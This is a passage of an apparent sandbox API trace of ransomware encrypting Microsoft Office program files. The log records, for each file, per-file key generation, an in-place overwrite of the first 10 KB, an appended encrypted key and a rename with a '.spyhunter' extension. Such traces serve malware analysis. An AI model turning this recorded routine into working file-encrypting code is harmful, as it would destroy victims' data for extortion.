(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0102.707] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb20*=0x30) returned 1 [0102.707] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 63 [0103.320] StrStrW (lpFirst="OMSINTL.DLL", lpSrch=".txt") returned 0x0 [0103.320] GetProcessHeap () returned 0x2c0000 [0103.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.320] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fae4*=0x2800, lpOverlapped=0x0) returned 1 [0103.378] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.378] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fae4*=0x2800, lpOverlapped=0x0) returned 1 [0103.378] GetProcessHeap () returned 0x2c0000 [0103.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.378] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.379] WriteFile (in: hFile=0x158, lpBuffer=0x57fb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x57fb24*, lpNumberOfBytesWritten=0x57fae4*=0x4, lpOverlapped=0x0) returned 1 [0103.415] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fae4*=0x30, lpOverlapped=0x0) returned 1 [0103.415] CloseHandle (hObject=0x158) returned 1 [0103.415] GetProcessHeap () returned 0x2c0000 [0103.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.416] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.spyhunter") returned 73 [0103.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.spyhunter")) returned 1 [0103.416] GetProcessHeap () returned 0x2c0000 [0103.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.417] GetProcessHeap () returned 0x2c0000 [0103.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0103.417] GetProcessHeap () returned 0x2c0000 [0103.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x315968 | out: hHeap=0x2c0000) returned 1 [0103.417] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb28 | out: pbBuffer=0x57fb28) returned 1 [0103.417] GetProcessHeap () returned 0x2c0000 [0103.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0103.417] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb20*=0x30) returned 1 [0103.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchphn.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.418] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT") returned 64 [0103.418] StrStrW (lpFirst="PSRCHPHN.DAT", lpSrch=".txt") returned 0x0 [0103.418] GetProcessHeap () returned 0x2c0000 [0103.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.418] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fae4*=0xd18, lpOverlapped=0x0) returned 1 [0103.751] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.751] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd18, lpNumberOfBytesWritten=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fae4*=0xd18, lpOverlapped=0x0) returned 1 [0103.751] GetProcessHeap () returned 0x2c0000 [0103.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.751] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.751] WriteFile (in: hFile=0x158, lpBuffer=0x57fb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x57fb24*, lpNumberOfBytesWritten=0x57fae4*=0x4, lpOverlapped=0x0) returned 1 [0103.751] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fae4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fae4*=0x30, lpOverlapped=0x0) returned 1 [0103.751] CloseHandle (hObject=0x158) returned 1 [0103.751] GetProcessHeap () returned 0x2c0000 [0103.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.752] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT.spyhunter") returned 74 [0103.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchphn.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchphn.dat.spyhunter")) returned 1 [0103.752] GetProcessHeap () returned 0x2c0000 [0103.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.752] GetProcessHeap () returned 0x2c0000 [0103.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0103.753] GetProcessHeap () returned 0x2c0000 [0103.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca8f08 | out: hHeap=0x2c0000) returned 1 [0103.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb20 | out: pbBuffer=0x57fb20) returned 1 [0103.753] GetProcessHeap () returned 0x2c0000 [0103.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0103.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb18*=0x30) returned 1 [0103.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlex.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT") returned 64 [0103.753] StrStrW (lpFirst="PSRCHLEX.DAT", lpSrch=".txt") returned 0x0 [0103.753] GetProcessHeap () returned 0x2c0000 [0103.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.754] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fadc*=0x2800, lpOverlapped=0x0) returned 1 [0104.129] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.129] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fadc*=0x2800, lpOverlapped=0x0) returned 1 [0104.130] GetProcessHeap () returned 0x2c0000 [0104.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0104.130] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.130] WriteFile (in: hFile=0x158, lpBuffer=0x57fb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x57fb1c*, lpNumberOfBytesWritten=0x57fadc*=0x4, lpOverlapped=0x0) returned 1 [0104.136] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fadc*=0x30, lpOverlapped=0x0) returned 1 [0104.136] CloseHandle (hObject=0x158) returned 1 [0104.136] GetProcessHeap () returned 0x2c0000 [0104.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.136] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT.spyhunter") returned 74 [0104.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlex.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlex.dat.spyhunter")) returned 1 [0104.140] GetProcessHeap () returned 0x2c0000 [0104.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.140] GetProcessHeap () returned 0x2c0000 [0104.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0104.140] GetProcessHeap () returned 0x2c0000 [0104.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca8d68 | out: hHeap=0x2c0000) returned 1 [0104.140] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb20 | out: pbBuffer=0x57fb20) returned 1 [0104.140] GetProcessHeap () returned 0x2c0000 [0104.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0104.140] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb18*=0x30) returned 1 [0104.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0104.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 65 [0104.141] StrStrW (lpFirst="VISIO_COL.HXT", lpSrch=".txt") returned 0x0 [0104.141] GetProcessHeap () returned 0x2c0000 [0104.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0104.141] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fadc*=0xcd, lpOverlapped=0x0) returned 1 [0104.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.142] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fadc*=0xcd, lpOverlapped=0x0) returned 1 [0104.142] GetProcessHeap () returned 0x2c0000 [0104.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0104.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.142] WriteFile (in: hFile=0x158, lpBuffer=0x57fb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x57fb1c*, lpNumberOfBytesWritten=0x57fadc*=0x4, lpOverlapped=0x0) returned 1 [0104.142] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fadc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fadc*=0x30, lpOverlapped=0x0) returned 1 [0104.143] CloseHandle (hObject=0x158) returned 1 [0104.143] GetProcessHeap () returned 0x2c0000 [0104.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.143] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT.spyhunter") returned 75 [0104.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt.spyhunter")) returned 1 [0104.144] GetProcessHeap () returned 0x2c0000 [0104.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.144] GetProcessHeap () returned 0x2c0000 [0104.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0104.144] GetProcessHeap () returned 0x2c0000 [0104.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca98c8 | out: hHeap=0x2c0000) returned 1 [0104.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb18 | out: pbBuffer=0x57fb18) returned 1 [0104.144] GetProcessHeap () returned 0x2c0000 [0104.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0104.144] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb10*=0x30) returned 1 [0104.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0104.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 65 [0104.145] StrStrW (lpFirst="VISIO_COL.HXC", lpSrch=".txt") returned 0x0 [0104.145] GetProcessHeap () returned 0x2c0000 [0104.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0104.145] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fad4*=0x26d, lpOverlapped=0x0) returned 1 [0104.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.151] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fad4*=0x26d, lpOverlapped=0x0) returned 1 [0104.151] GetProcessHeap () returned 0x2c0000 [0104.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0104.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.151] WriteFile (in: hFile=0x158, lpBuffer=0x57fb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x57fb14*, lpNumberOfBytesWritten=0x57fad4*=0x4, lpOverlapped=0x0) returned 1 [0104.152] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fad4*=0x30, lpOverlapped=0x0) returned 1 [0104.152] CloseHandle (hObject=0x158) returned 1 [0104.153] GetProcessHeap () returned 0x2c0000 [0104.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0104.153] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC.spyhunter") returned 75 [0104.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc.spyhunter")) returned 1 [0104.160] GetProcessHeap () returned 0x2c0000 [0104.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0104.161] GetProcessHeap () returned 0x2c0000 [0104.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0104.161] GetProcessHeap () returned 0x2c0000 [0104.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca97f8 | out: hHeap=0x2c0000) returned 1 [0104.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb18 | out: pbBuffer=0x57fb18) returned 1 [0104.161] GetProcessHeap () returned 0x2c0000 [0104.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0104.161] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb10*=0x30) returned 1 [0104.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0104.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC") returned 71 [0104.162] StrStrW (lpFirst="WINWORD.DEV_COL.HXC", lpSrch=".txt") returned 0x0 [0104.162] GetProcessHeap () returned 0x2c0000 [0104.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0104.162] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fad4*=0x28b, lpOverlapped=0x0) returned 1 [0104.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.208] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fad4*=0x28b, lpOverlapped=0x0) returned 1 [0104.208] GetProcessHeap () returned 0x2c0000 [0104.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0104.209] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.209] WriteFile (in: hFile=0x158, lpBuffer=0x57fb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x57fb14*, lpNumberOfBytesWritten=0x57fad4*=0x4, lpOverlapped=0x0) returned 1 [0104.209] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fad4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fad4*=0x30, lpOverlapped=0x0) returned 1 [0104.209] CloseHandle (hObject=0x158) returned 1 [0104.209] GetProcessHeap () returned 0x2c0000 [0104.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.210] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC.spyhunter") returned 81 [0104.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_COL.HXC.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_col.hxc.spyhunter")) returned 1 [0104.211] GetProcessHeap () returned 0x2c0000 [0104.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.211] GetProcessHeap () returned 0x2c0000 [0104.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0104.212] GetProcessHeap () returned 0x2c0000 [0104.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9c3c0 | out: hHeap=0x2c0000) returned 1 [0104.212] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb10 | out: pbBuffer=0x57fb10) returned 1 [0104.212] GetProcessHeap () returned 0x2c0000 [0104.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0104.212] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb08*=0x30) returned 1 [0104.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACEDAO.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0104.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACEDAO.DLL") returned 57 [0104.213] StrStrW (lpFirst="ACEDAO.DLL", lpSrch=".txt") returned 0x0 [0104.213] GetProcessHeap () returned 0x2c0000 [0104.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0104.213] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57facc*=0x2800, lpOverlapped=0x0) returned 1 [0104.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.271] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57facc*=0x2800, lpOverlapped=0x0) returned 1 [0104.271] GetProcessHeap () returned 0x2c0000 [0104.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0104.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.271] WriteFile (in: hFile=0x158, lpBuffer=0x57fb0c*, nNumberOfBytesToWrite=0x4, 